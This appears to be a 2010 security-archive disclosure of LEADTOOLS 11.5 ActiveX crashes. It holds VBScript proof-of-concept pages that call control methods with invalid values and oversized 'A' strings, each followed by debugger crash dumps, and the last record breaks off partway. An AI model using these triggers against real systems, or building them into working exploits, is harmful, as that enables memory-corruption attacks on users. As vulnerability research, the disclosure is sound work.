Lucene search
Matthew BerginPACKETSTORM:95586HistoryNov 08, 2010 - 12:00 a.m.
LEADTOOLS 11.5.0.9 Access Violation
2010-11-0800:00:00
Matthew Bergin
packetstormsecurity.com
34
`=====================================
<html>
Test Exploit Page
<object classid='clsid:00110060-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Rational\common\ltdlg11n.ocx"
prototype = "Function GetColorRes ( ByVal hWnd As Long ) As Integer"
memberName = "GetColorRes"
progid = "LEADDlgLib.LEADDlg"
argCount = 1
arg1=-1
target.GetColorRes arg1
</script>
Exception Code: ACCESS_VIOLATION
Disasm: 7E428FB5 MOV [EAX],ECX
Seh Chain:
--------------------------------------------------
1 73352960 VBSCRIPT.dll
2 7C839AD8 KERNEL32.dll
Called From Returns To
--------------------------------------------------
USER32.7E428FB5 LTKRN11n.2000A033
Registers:
--------------------------------------------------
EIP 7E428FB5 -> 8B044689
EAX 7713643C -> 8B044689
EBX 00000000
ECX 00000000
EDX 00000001
EDI 02AB1FE0 -> 00000000
ESI 771363F8 -> F33BF08B
EBP 0013EC60 -> 00000000
ESP 0013EC60 -> 00000000
Block Disassembly:
--------------------------------------------------
7E428FA8 PUSH EBP
7E428FA9 MOV EBP,ESP
7E428FAB MOV EAX,[EBP+8]
7E428FAE TEST EAX,EAX
7E428FB0 JE SHORT 7E428FCC
7E428FB2 MOV ECX,[EBP+C]
7E428FB5 MOV [EAX],ECX <--- CRASH
7E428FB7 MOV ECX,[EBP+10]
7E428FBA MOV [EAX+4],ECX
7E428FBD MOV ECX,[EBP+14]
7E428FC0 MOV [EAX+8],ECX
7E428FC3 MOV ECX,[EBP+18]
7E428FC6 MOV [EAX+C],ECX
7E428FC9 XOR EAX,EAX
7E428FCB INC EAX
ArgDump:
--------------------------------------------------
EBP+8 7713643C -> 8B044689
EBP+12 00000000
EBP+16 00000000
EBP+20 00000000
EBP+24 00000000
EBP+28 02AB1FE0 -> 00000000
Stack Dump:
--------------------------------------------------
13EC60 00 00 00 00 33 A0 00 20 3C 64 13 77 00 00 00 00 [.........d.w....]
13EC70 00 00 00 00 00 00 00 00 00 00 00 00 E0 1F AB 02 [................]
13EC80 D4 EC 13 00 20 1A FF 1F F8 63 13 77 E0 1F AB 02 [.........c.w....]
13EC90 B4 ED 13 00 3A 11 BE 1F D4 EC 13 00 AC ED 13 00 [................]
13ECA0 E0 1F AB 02 58 1F AB 02 F8 1E AB 02 00 00 00 00 [....X...........]
ApiLog
--------------------------------------------------
***** Installing Hooks *****
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
=====================================
<html>
Test Exploit Page
<object classid='clsid:00110060-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Rational\common\ltdlg11n.ocx"
prototype = "Property Let Bitmap As Long"
memberName = "Bitmap"
progid = "LEADDlgLib.LEADDlg"
argCount = 1
arg1=-1
target.Bitmap = arg1
</script>
Exception Code: ACCESS_VIOLATION
Disasm: AA62D2 CMP DWORD PTR [EAX],6461656C
Seh Chain:
--------------------------------------------------
1 73352960 VBSCRIPT.dll
2 7C839AD8 KERNEL32.dll
Called From Returns To
--------------------------------------------------
Registers:
--------------------------------------------------
EIP 00AA62D2
EAX 00000000
EBX 7C80FF22 -> A868146A
ECX 02AB2128 -> 00000000
EDX 00150608 -> 7C97E5A0
EDI 02AB2128 -> 00000000
ESI 02AB1F58 -> 00AB07C0
EBP FFFFFFFF
ESP 0013ED98 -> 00AA6292
Block Disassembly:
--------------------------------------------------
AA62BE POP EBX
AA62BF RETN 8
AA62C2 PUSH DWORD PTR [ESP+4]
AA62C6 CALL [AB00EC]
AA62CC MOV ECX,[ESP+8]
AA62D0 MOV [ECX],EAX
AA62D2 CMP DWORD PTR [EAX],6461656C <--- CRASH
AA62D8 JE SHORT 00AA62DF
AA62DA AND DWORD PTR [ECX],0
AA62DD JMP SHORT 00AA62E2
AA62DF MOV EAX,[EAX+8]
AA62E2 RETN 8
AA62E5 PUSH ESI
AA62E6 MOV ESI,[ESP+8]
AA62EA LEA ECX,[ESI-60]
Stack Dump:
--------------------------------------------------
13ED98 92 62 AA 00 FF FF FF FF 28 21 AB 02 00 00 00 00 [.b..............]
13EDA8 AC 60 1A 00 CC ED 13 00 C0 07 AB 00 D9 5C 13 77 [.`...........\.w]
13EDB8 58 1F AB 02 FF FF FF FF 00 EE 13 00 B0 A0 B1 02 [X...............]
13EDC8 C0 ED 13 00 5C EE 13 00 E8 62 13 77 58 1F AB 02 [....\....b.wX...]
13EDD8 60 00 00 00 04 00 00 00 0A 00 00 00 01 00 00 00 [`...............]
ApiLog
--------------------------------------------------
***** Installing Hooks *****
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
=====================================
<html>
Test Exploit Page
<object classid='clsid:00110200-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Rational\common\lttmb11n.ocx"
prototype = "Function BrowseDir ( ByVal pszDirectory As String ) As Integer"
memberName = "BrowseDir"
progid = "LEADThumbLib.LEADThumb"
argCount = 1
arg1=String(4116, "A")
target.BrowseDir arg1
</script>
Exception Code: ACCESS_VIOLATION
Disasm: 7C80BE74 MOV CL,[EAX]
Seh Chain:
--------------------------------------------------
1 7C839AD8 KERNEL32.dll
2 73352960 VBSCRIPT.dll
3 7C839AD8 KERNEL32.dll
Called From Returns To
--------------------------------------------------
KERNEL32.7C80BE74 LTTMB11n.AC1153
LTTMB11n.AC1153 OLEAUT32.77135CD9
OLEAUT32.77135CD9 OLEAUT32.771362E8
OLEAUT32.771362E8 lttmb11n.AA6E11
lttmb11n.AA6E11 lttmb11n.AA27C9
lttmb11n.AA27C9 VBSCRIPT.73303EB7
VBSCRIPT.73303EB7 VBSCRIPT.73303E27
VBSCRIPT.73303E27 VBSCRIPT.73303397
VBSCRIPT.73303397 VBSCRIPT.73303D88
VBSCRIPT.73303D88 VBSCRIPT.7330409F
VBSCRIPT.7330409F VBSCRIPT.733063EE
VBSCRIPT.733063EE VBSCRIPT.73306373
VBSCRIPT.73306373 VBSCRIPT.73306BA5
VBSCRIPT.73306BA5 VBSCRIPT.73306D9D
VBSCRIPT.73306D9D VBSCRIPT.73305103
VBSCRIPT.73305103 SCROBJ.5CE44396
SCROBJ.5CE44396 SCROBJ.5CE4480B
SCROBJ.5CE4480B SCROBJ.5CE446A6
SCROBJ.5CE446A6 SCROBJ.5CE44643
SCROBJ.5CE44643 SCROBJ.5CE44608
SCROBJ.5CE44608 1013C93
1013C93 1006B0C
1006B0C 100332C
100332C 1003105
1003105 1003076
1003076 1002F16
1002F16 KERNEL32.7C817077
Registers:
--------------------------------------------------
EIP 7C80BE74
EAX 41414141
EBX 00000000
ECX 41414141
EDX 41414142
EDI 00AA46E9 -> 8BEC8B55
ESI FFFFFFF6
EBP 0013C560 -> 0013EDAC
ESP 0013C53C -> 00AA46E9
Block Disassembly:
--------------------------------------------------
7C80BE5D CALL 7C8024D6
7C80BE62 MOV EAX,[EBP+8]
7C80BE65 TEST EAX,EAX
7C80BE67 JE 7C836665
7C80BE6D AND DWORD PTR [EBP-4],0
7C80BE71 LEA EDX,[EAX+1]
7C80BE74 MOV CL,[EAX] <--- CRASH
7C80BE76 INC EAX
7C80BE77 TEST CL,CL
7C80BE79 JNZ SHORT 7C80BE74
7C80BE7B SUB EAX,EDX
7C80BE7D OR DWORD PTR [EBP-4],FFFFFFFF
7C80BE81 CALL 7C802511
7C80BE86 RETN 4
7C80BE89 NOP
ArgDump:
--------------------------------------------------
EBP+8 41414141
EBP+12 0013EDAC -> 0013EDCC
EBP+16 00000008
EBP+20 02231F58 -> 00AAA628
EBP+24 0013CD70 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+28 00000000
Stack Dump:
--------------------------------------------------
13C53C E9 46 AA 00 F6 FF FF FF 00 00 00 00 3C C5 13 00 [.F..............]
13C54C AC F1 13 00 AC F1 13 00 D8 9A 83 7C 90 BE 80 7C [................]
13C55C 00 00 00 00 AC ED 13 00 53 11 AC 00 41 41 41 41 [........S.......]
13C56C AC ED 13 00 08 00 00 00 58 1F 23 02 70 CD 13 00 [........X...p...]
13C57C 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 [................]
Exception Code: ACCESS_VIOLATION
Disasm: AC115A CMP BYTE PTR [ECX+EAX-1],5C
Seh Chain:
--------------------------------------------------
1 73352960 VBSCRIPT.dll
2 7C839AD8 KERNEL32.dll
Called From Returns To
--------------------------------------------------
LTTMB11n.AC115A OLEAUT32.77135CD9
OLEAUT32.77135CD9 OLEAUT32.771362E8
OLEAUT32.771362E8 lttmb11n.AA6E11
lttmb11n.AA6E11 lttmb11n.AA27C9
lttmb11n.AA27C9 VBSCRIPT.73303EB7
VBSCRIPT.73303EB7 VBSCRIPT.73303E27
VBSCRIPT.73303E27 VBSCRIPT.73303397
VBSCRIPT.73303397 VBSCRIPT.73303D88
VBSCRIPT.73303D88 VBSCRIPT.7330409F
VBSCRIPT.7330409F VBSCRIPT.733063EE
VBSCRIPT.733063EE VBSCRIPT.73306373
VBSCRIPT.73306373 VBSCRIPT.73306BA5
VBSCRIPT.73306BA5 VBSCRIPT.73306D9D
VBSCRIPT.73306D9D VBSCRIPT.73305103
VBSCRIPT.73305103 SCROBJ.5CE44396
SCROBJ.5CE44396 SCROBJ.5CE4480B
SCROBJ.5CE4480B SCROBJ.5CE446A6
SCROBJ.5CE446A6 SCROBJ.5CE44643
SCROBJ.5CE44643 SCROBJ.5CE44608
SCROBJ.5CE44608 1013C93
1013C93 1006B0C
1006B0C 100332C
100332C 1003105
1003105 1003076
1003076 1002F16
1002F16 KERNEL32.7C817077
Registers:
--------------------------------------------------
EIP 00AC115A
EAX 00000000
EBX 00000000
ECX 41414141
EDX 00000000
EDI 00AA46E9 -> 8BEC8B55
ESI FFFFFFF6
EBP 0013EDAC -> 0013EDCC
ESP 0013C56C -> 0013EDAC
Block Disassembly:
--------------------------------------------------
AC113E PUSH EAX
AC113F CALL [ACE1B0]
AC1145 MOV ECX,[ESP+7B4]
AC114C PUSH ECX
AC114D CALL [ACE1AC]
AC1153 MOV ECX,[ESP+7B4]
AC115A CMP BYTE PTR [ECX+EAX-1],5C <--- CRASH
AC115F JE SHORT 00AC1171
AC1161 LEA EAX,[ESP+68]
AC1165 PUSH ACA03C
AC116A PUSH EAX
AC116B CALL [ACE1A8]
AC1171 MOV EAX,[ESP+7B8]
AC1178 LEA ECX,[ESP+68]
AC117C PUSH EAX
ArgDump:
--------------------------------------------------
EBP+8 02231F58 -> 00AAA628
EBP+12 00184934 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 0013EE10 -> 00000000
EBP+20 0013EE00 -> 00130000
EBP+24 02281A50 -> 00000038
EBP+28 0013EDC0 -> 0013EE00
Stack Dump:
--------------------------------------------------
13C56C AC ED 13 00 08 00 00 00 58 1F 23 02 70 CD 13 00 [........X...p...]
13C57C 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 [................]
13C58C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
13C59C 1C 00 00 00 96 00 00 00 96 00 00 00 00 02 00 00 [................]
13C5AC 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 [................]
ApiLog
--------------------------------------------------
***** Installing Hooks *****
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
=====================================
<html>
Test Exploit Page
<object classid='clsid:00110100-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Rational\common\ltlst11n.ocx"
prototype = "Function Insert ( ByVal Bitmap As Long , ByVal pszText As String , ByVal Data As Long ) As Integer"
memberName = "Insert"
progid = "LEADImgListLib.LEADImgList"
argCount = 3
arg1=1
arg2="defaultV"
arg3=-2147483647
target.Insert arg1 ,arg2 ,arg3
</script>
Exception Code: ACCESS_VIOLATION
Disasm: 7C809EDA MOV AL,[EDX]
Seh Chain:
--------------------------------------------------
1 7C839AD8 KERNEL32.dll
2 7C839AD8 KERNEL32.dll
3 73352960 VBSCRIPT.dll
4 7C839AD8 KERNEL32.dll
Called From Returns To
--------------------------------------------------
KERNEL32.7C809EDA KERNEL32.7C834E80
KERNEL32.7C834E80 ltlst11n.AA1104
ltlst11n.AA1104 OLEAUT32.77135CD9
OLEAUT32.77135CD9 OLEAUT32.771362E8
OLEAUT32.771362E8 ltlst11n.AAAAB2
ltlst11n.AAAAB2 ltlst11n.AA45C5
ltlst11n.AA45C5 VBSCRIPT.73303EB7
VBSCRIPT.73303EB7 VBSCRIPT.73303E27
VBSCRIPT.73303E27 VBSCRIPT.73303397
VBSCRIPT.73303397 VBSCRIPT.73303D88
VBSCRIPT.73303D88 VBSCRIPT.7330409F
VBSCRIPT.7330409F VBSCRIPT.733063EE
VBSCRIPT.733063EE VBSCRIPT.73306373
VBSCRIPT.73306373 VBSCRIPT.73306BA5
VBSCRIPT.73306BA5 VBSCRIPT.73306D9D
VBSCRIPT.73306D9D VBSCRIPT.73305103
VBSCRIPT.73305103 SCROBJ.5CE44396
SCROBJ.5CE44396 SCROBJ.5CE4480B
SCROBJ.5CE4480B SCROBJ.5CE446A6
SCROBJ.5CE446A6 SCROBJ.5CE44643
SCROBJ.5CE44643 SCROBJ.5CE44608
SCROBJ.5CE44608 1013C93
1013C93 1006B0C
1006B0C 100332C
100332C 1003105
1003105 1003076
1003076 1002F16
1002F16 KERNEL32.7C817077
Registers:
--------------------------------------------------
EIP 7C809EDA
EAX 00000001
EBX 00000001
ECX 02650B60 -> 00AB7948
EDX 00000001
EDI 00000001
ESI 00001000
EBP 0013ED20 -> 0013ED60
ESP 0013ECF4 -> 00000000
Block Disassembly:
--------------------------------------------------
7C809EC2 TEST EDX,EDX
7C809EC4 JE 7C80BFD0
7C809ECA LEA EDI,[EDX+EAX-1]
7C809ECE CMP EDI,EDX
7C809ED0 JB 7C80BFD0
7C809ED6 AND DWORD PTR [EBP-4],0
7C809EDA MOV AL,[EDX] <--- CRASH
7C809EDC LEA EAX,[ESI-1]
7C809EDF NOT EAX
7C809EE1 MOV ECX,EAX
7C809EE3 AND ECX,EDX
7C809EE5 MOV [EBP-1C],ECX
7C809EE8 AND EAX,EDI
7C809EEA MOV [EBP-20],EAX
7C809EED CMP ECX,EAX
ArgDump:
--------------------------------------------------
EBP+8 00000001
EBP+12 00000001
EBP+16 00000000
EBP+20 02650BC0 -> 00AB77F0
EBP+24 00000000
EBP+28 0013EDB4 -> 00181884
Stack Dump:
--------------------------------------------------
13ECF4 00 00 00 00 C0 0B 65 02 01 00 00 00 02 00 00 00 [......e.........]
13ED04 03 00 00 00 F4 EC 13 00 D0 97 53 00 50 ED 13 00 [..........S.P...]
13ED14 D8 9A 83 7C 08 9F 80 7C 00 00 00 00 60 ED 13 00 [............`...]
13ED24 80 4E 83 7C 01 00 00 00 01 00 00 00 00 00 00 00 [.N..............]
13ED34 C0 0B 65 02 00 00 00 00 B4 ED 13 00 A0 ED 13 00 [..e.............]
Exception Code: ACCESS_VIOLATION
Disasm: AA110A CMP DWORD PTR [EAX],6461656C
Seh Chain:
--------------------------------------------------
1 73352960 VBSCRIPT.dll
2 7C839AD8 KERNEL32.dll
Called From Returns To
--------------------------------------------------
ltlst11n.AA110A OLEAUT32.77135CD9
OLEAUT32.77135CD9 OLEAUT32.771362E8
OLEAUT32.771362E8 ltlst11n.AAAAB2
ltlst11n.AAAAB2 ltlst11n.AA45C5
ltlst11n.AA45C5 VBSCRIPT.73303EB7
VBSCRIPT.73303EB7 VBSCRIPT.73303E27
VBSCRIPT.73303E27 VBSCRIPT.73303397
VBSCRIPT.73303397 VBSCRIPT.73303D88
VBSCRIPT.73303D88 VBSCRIPT.7330409F
VBSCRIPT.7330409F VBSCRIPT.733063EE
VBSCRIPT.733063EE VBSCRIPT.73306373
VBSCRIPT.73306373 VBSCRIPT.73306BA5
VBSCRIPT.73306BA5 VBSCRIPT.73306D9D
VBSCRIPT.73306D9D VBSCRIPT.73305103
VBSCRIPT.73305103 SCROBJ.5CE44396
SCROBJ.5CE44396 SCROBJ.5CE4480B
SCROBJ.5CE4480B SCROBJ.5CE446A6
SCROBJ.5CE446A6 SCROBJ.5CE44643
SCROBJ.5CE44643 SCROBJ.5CE44608
SCROBJ.5CE44608 1013C93
1013C93 1006B0C
1006B0C 100332C
100332C 1003105
1003105 1003076
1003076 1002F16
1002F16 KERNEL32.7C817077
Registers:
--------------------------------------------------
EIP 00AA110A
EAX 00000000
EBX 00000000
ECX 0013EDA0 -> 00000000
EDX 00000000
EDI 00000000
ESI 02650BC0 -> 00AB77F0
EBP 0013EDA4 -> 0013EDCC
ESP 0013ED6C -> 00AA8B02
Block Disassembly:
--------------------------------------------------
AA10F6 LEAVE
AA10F7 RETN 8
AA10FA PUSH DWORD PTR [ESP+4]
AA10FE CALL [AB7164]
AA1104 MOV ECX,[ESP+8]
AA1108 MOV [ECX],EAX
AA110A CMP DWORD PTR [EAX],6461656C <--- CRASH
AA1110 JE SHORT 00AA1117
AA1112 AND DWORD PTR [ECX],0
AA1115 JMP SHORT 00AA111A
AA1117 MOV EAX,[EAX+8]
AA111A RETN 8
AA111D PUSH EBP
AA111E MOV EBP,ESP
AA1120 SUB ESP,20
ArgDump:
--------------------------------------------------
EBP+8 02650BC0 -> 00AB77F0
EBP+12 00000001
EBP+16 00181884 -> Uni: defaultV
EBP+20 80000001
EBP+24 0013EE10 -> 00000000
EBP+28 0013EE00 -> 00130000
Stack Dump:
--------------------------------------------------
13ED6C 02 8B AA 00 01 00 00 00 A0 ED 13 00 00 00 00 00 [................]
13ED7C B4 32 18 00 F0 77 AB 00 04 00 00 00 03 00 00 00 [.....w..........]
13ED8C 30 F0 13 00 7C 52 A5 02 00 00 00 00 FF FF FF FF [.....R..........]
13ED9C 00 00 00 00 00 00 00 00 CC ED 13 00 D9 5C 13 77 [.............\.w]
13EDAC C0 0B 65 02 01 00 00 00 84 18 18 00 01 00 00 80 [..e.............]
ApiLog
--------------------------------------------------
***** Installing Hooks *****
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
=====================================
<html>
Test Exploit Page
<object classid='clsid:00110050-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Rational\common\ltisi11n.ocx"
prototype = "Property Let DriverName As String"
memberName = "DriverName"
progid = "LEADISISLib.LEADISIS"
argCount = 1
arg1=String(65535, "A")
target.DriverName = arg1
</script>
Exception Code: ACCESS_VIOLATION
Disasm: 7C80BEB9 MOV [EDX],AL
Seh Chain:
--------------------------------------------------
1 7C839AD8 KERNEL32.dll
2 73352960 VBSCRIPT.dll
3 7C839AD8 KERNEL32.dll
Called From Returns To
--------------------------------------------------
KERNEL32.7C80BEB9 ltisi11n.AA1537
ltisi11n.AA1537 OLEAUT32.77135CD9
OLEAUT32.77135CD9 OLEAUT32.771362E8
OLEAUT32.771362E8 ltisi11n.AA64D7
ltisi11n.AA64D7 ltisi11n.AA319B
ltisi11n.AA319B VBSCRIPT.73303EB7
VBSCRIPT.73303EB7 VBSCRIPT.73303E27
VBSCRIPT.73303E27 VBSCRIPT.73303397
VBSCRIPT.73303397 VBSCRIPT.73303D88
VBSCRIPT.73303D88 VBSCRIPT.73311302
VBSCRIPT.73311302 VBSCRIPT.733063EE
VBSCRIPT.733063EE VBSCRIPT.73306373
VBSCRIPT.73306373 VBSCRIPT.73306BA5
VBSCRIPT.73306BA5 VBSCRIPT.73306D9D
VBSCRIPT.73306D9D VBSCRIPT.73305103
VBSCRIPT.73305103 SCROBJ.5CE44396
SCROBJ.5CE44396 SCROBJ.5CE4480B
SCROBJ.5CE4480B SCROBJ.5CE446A6
SCROBJ.5CE446A6 SCROBJ.5CE44643
SCROBJ.5CE44643 SCROBJ.5CE44608
SCROBJ.5CE44608 1013C93
1013C93 1006B0C
1006B0C 100332C
100332C 1003105
1003105 1003076
1003076 1002F16
1002F16 KERNEL32.7C817077
Registers:
--------------------------------------------------
EIP 7C80BEB9 -> AD0013ED
EAX 0013BD41 -> AD0013ED
EBX 00AAA760 -> 00AA408F
ECX 0013CDA4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 02A73000
EDI 0000302A
ESI 02A71F58 -> 00AAA760
EBP 0013BD6C -> 0013EDB0
ESP 0013BD48 -> 0000302A -> Uni: *0*0
Block Disassembly:
--------------------------------------------------
7C80BEA3 PUSH 7C80BED0
7C80BEA8 CALL 7C8024D6
7C80BEAD AND DWORD PTR [EBP-4],0
7C80BEB1 MOV ECX,[EBP+C]
7C80BEB4 MOV EDX,[EBP+8]
7C80BEB7 MOV AL,[ECX]
7C80BEB9 MOV [EDX],AL <--- CRASH
7C80BEBB INC ECX
7C80BEBC INC EDX
7C80BEBD TEST AL,AL
7C80BEBF JNZ SHORT 7C80BEB7
7C80BEC1 OR DWORD PTR [EBP-4],FFFFFFFF
7C80BEC5 MOV EAX,[EBP+8]
7C80BEC8 CALL 7C802511
7C80BECD RETN 8
ArgDump:
--------------------------------------------------
EBP+8 02A71FD8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12 0013BD7C -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 41414141
EBP+20 41414141
EBP+24 41414141
EBP+28 41414141
Stack Dump:
--------------------------------------------------
13BD48 2A 30 00 00 58 1F A7 02 60 A7 AA 00 48 BD 13 00 [....X...`...H...]
13BD58 7C BD 13 00 AC F1 13 00 D8 9A 83 7C D0 BE 80 7C [................]
13BD68 00 00 00 00 B0 ED 13 00 37 15 AA 00 D8 1F A7 02 [................]
13BD78 7C BD 13 00 41 41 41 41 41 41 41 41 41 41 41 41 [................]
13BD88 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
Exception Code: ACCESS_VIOLATION
Disasm: 7C919084 MOV ECX,[EBX]
Seh Chain:
--------------------------------------------------
1 7C90E920 ntdll.dll
2 7C90E920 ntdll.dll
3 7C90E920 ntdll.dll
4 7C90E920 ntdll.dll
5 73352960 VBSCRIPT.dll
6 7C839AD8 KERNEL32.dll
Called From Returns To
--------------------------------------------------
ntdll.7C919084 ntdll.7C96EEA0
ntdll.7C96EEA0 ntdll.7C94B394
ntdll.7C94B394 ntdll.7C918F21
ntdll.7C918F21 ltisi11n.AA69BC
ltisi11n.AA69BC ltisi11n.AA7189
ltisi11n.AA7189 ltisi11n.AA154C
ltisi11n.AA154C OLEAUT32.77135CD9
OLEAUT32.77135CD9 OLEAUT32.771362E8
OLEAUT32.771362E8 ltisi11n.AA64D7
ltisi11n.AA64D7 ltisi11n.AA319B
ltisi11n.AA319B VBSCRIPT.73303EB7
VBSCRIPT.73303EB7 VBSCRIPT.73303E27
VBSCRIPT.73303E27 VBSCRIPT.73303397
VBSCRIPT.73303397 VBSCRIPT.73303D88
VBSCRIPT.73303D88 VBSCRIPT.73311302
VBSCRIPT.73311302 VBSCRIPT.733063EE
VBSCRIPT.733063EE VBSCRIPT.73306373
VBSCRIPT.73306373 VBSCRIPT.73306BA5
VBSCRIPT.73306BA5 VBSCRIPT.73306D9D
VBSCRIPT.73306D9D VBSCRIPT.73305103
VBSCRIPT.73305103 SCROBJ.5CE44396
SCROBJ.5CE44396 SCROBJ.5CE4480B
SCROBJ.5CE4480B SCROBJ.5CE446A6
SCROBJ.5CE446A6 SCROBJ.5CE44643
SCROBJ.5CE44643 SCROBJ.5CE44608
SCROBJ.5CE44608 1013C93
1013C93 1006B0C
1006B0C 100332C
100332C 1003105
1003105 1003076
1003076 1002F16
1002F16 KERNEL32.7C817077
Registers:
--------------------------------------------------
EIP 7C919084 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EAX 02A72100 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBX 41414141
ECX 00004141
EDX 02A70168 -> 00000000
EDI 41414141
ESI 02A720F8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 0013B824 -> 0013B8A8
ESP 0013B608 -> 0000001C
Block Disassembly:
--------------------------------------------------
7C91906D MOV [EBP-25],AL
7C919070 LEA EAX,[ESI+8]
7C919073 MOV EDI,[EAX]
7C919075 MOV [EBP-1E4],EDI
7C91907B MOV EBX,[ESI+C]
7C91907E MOV [EBP-164],EBX
7C919084 MOV ECX,[EBX] <--- CRASH
7C919086 CMP ECX,[EDI+4]
7C919089 JNZ 7C92CC59
7C91908F CMP ECX,EAX
7C919091 JNZ 7C92CC59
7C919097 PUSH ESI
7C919098 PUSH DWORD PTR [EBP-1C]
7C91909B CALL 7C910684
7C9190A0 MOV [EBX],EDI
ArgDump:
--------------------------------------------------
EBP+8 02A70000 -> 000000C8
EBP+12 50000161
EBP+16 0000001C
EBP+20 02A70000 -> 000000C8
EBP+24 00000000
EBP+28 02A70000 -> 000000C8
Stack Dump:
--------------------------------------------------
13B608 1C 00 00 00 00 00 A7 02 01 00 00 00 00 00 00 00 [................]
13B618 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
13B628 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
13B638 00 00 00 00 00 00 00 00 41 41 41 41 00 00 00 00 [................]
13B648 00 00 00 00 00 00 00 00 00 60 13 00 00 00 14 00 [.........`......]
Exception Code: BREAKPOINT
Disasm: 7C90120E INT3
Seh Chain:
--------------------------------------------------
1 7C90E920 ntdll.dll
2 7C90E920 ntdll.dll
3 7C90E920 ntdll.dll
4 7C839AD8 KERNEL32.dll
Called From Returns To
--------------------------------------------------
ntdll.7C90120F ntdll.7C95F38C
ntdll.7C95F38C ntdll.7C96E507
ntdll.7C96E507 ntdll.7C96F75E
ntdll.7C96F75E ntdll.7C94BC4C
ntdll.7C94BC4C ntdll.7C927573
ntdll.7C927573 ltisi11n.AA69F4
ltisi11n.AA69F4 VBSCRIPT.733015F2
VBSCRIPT.733015F2 VBSCRIPT.7331EEE1
VBSCRIPT.7331EEE1 VBSCRIPT.7331F192
VBSCRIPT.7331F192 VBSCRIPT.7331F632
VBSCRIPT.7331F632 VBSCRIPT.73321CB3
VBSCRIPT.73321CB3 SCROBJ.5CE448DD
SCROBJ.5CE448DD SCROBJ.5CE49EEA
SCROBJ.5CE49EEA SCROBJ.5CE49E41
SCROBJ.5CE49E41 1013CE7
1013CE7 1006B0C
1006B0C 100332C
100332C 1003105
1003105 1003076
1003076 1002F16
1002F16 KERNEL32.7C817077
Registers:
--------------------------------------------------
EIP 7C90120F -> 000B0041
EAX 02A71EF0 -> 000B0041
EBX 02A720E4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 7C91EAD5 -> FF0014C2
EDX 0013EECE -> EEF4000A
EDI 000001EC
ESI 02A71EF0 -> 000B0041
EBP 0013F0D4 -> 0013F0EC
ESP 0013F0D0 -> 7C96E139
Block Disassembly:
--------------------------------------------------
7C9011FF TEST BYTE PTR [ESI+10],10
7C901203 JE 7C90FEF6
7C901209 POP ESI
7C90120A LEAVE
7C90120B RETN 4
7C90120E INT3
7C90120F RETN <--- CRASH
7C901210 MOV EDI,EDI
7C901212 INT3
7C901213 RETN
7C901214 MOV EDI,EDI
7C901216 MOV EAX,[ESP+4]
7C90121A INT3
7C90121B RETN 4
7C90121E MOV EAX,FS:[18]
ArgDump:
--------------------------------------------------
EBP+8 02A71EF0 -> 000B0041
EBP+12 02A71EF0 -> 000B0041
EBP+16 02A70000 -> 000000C8
EBP+20 02A71EF0 -> 000B0041
EBP+24 0013F100 -> 0013F174
EBP+28 7C96E507 -> 3374C084
Stack Dump:
--------------------------------------------------
13F0D0 39 E1 96 7C EC F0 13 00 8C F3 95 7C F0 1E A7 02 [................]
13F0E0 F0 1E A7 02 00 00 A7 02 F0 1E A7 02 00 F1 13 00 [................]
13F0F0 07 E5 96 7C 00 00 00 00 00 00 A7 02 F8 1E A7 02 [................]
13F100 74 F1 13 00 5E F7 96 7C 00 00 A7 02 F0 1E A7 02 [t...^...........]
13F110 14 F9 96 7C 00 00 A7 02 F8 1E A7 02 60 00 00 40 [............`...]
Exception Code: ACCESS_VIOLATION
Disasm: 7C96E478 CMP BYTE PTR [EBX+7],FF
Seh Chain:
--------------------------------------------------
1 7C90E920 ntdll.dll
2 7C90E920 ntdll.dll
3 7C839AD8 KERNEL32.dll
4 7C90E920 ntdll.dll
5 7C839AD8 KERNEL32.dll
6 7C839AD8 KERNEL32.dll
Called From Returns To
--------------------------------------------------
ntdll.7C96E478 ntdll.7C96FA1D
ntdll.7C96FA1D ntdll.7C94D281
ntdll.7C94D281 KERNEL32.7C834D23
KERNEL32.7C834D23 LTKRN11n.2001087F
LTKRN11n.2001087F ntdll.7C913A43
ntdll.7C913A43 KERNEL32.7C80C136
KERNEL32.7C80C136 KERNEL32.7C80B72F
Registers:
--------------------------------------------------
EIP 7C96E478
